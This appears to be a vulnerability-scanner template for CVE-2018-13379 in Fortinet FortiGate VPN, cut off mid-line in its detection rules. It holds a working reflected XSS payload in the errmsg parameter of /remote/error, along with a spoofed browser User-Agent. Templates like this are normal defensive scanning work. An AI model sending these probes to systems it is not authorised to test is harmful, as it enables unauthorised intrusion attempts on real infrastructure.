id: CVE-2018-13379 info: name: Fortinet Fortigate VPN Path Traversal & XSS risk: High params: - root: "{{.BaseURL}}" requests: - method: GET redirect: false url: >- {{.root}}//remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1)%3C/script%3E headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- StatusCode() == 200 && StringSearch("body", "remote/login") && StringSearch("body", "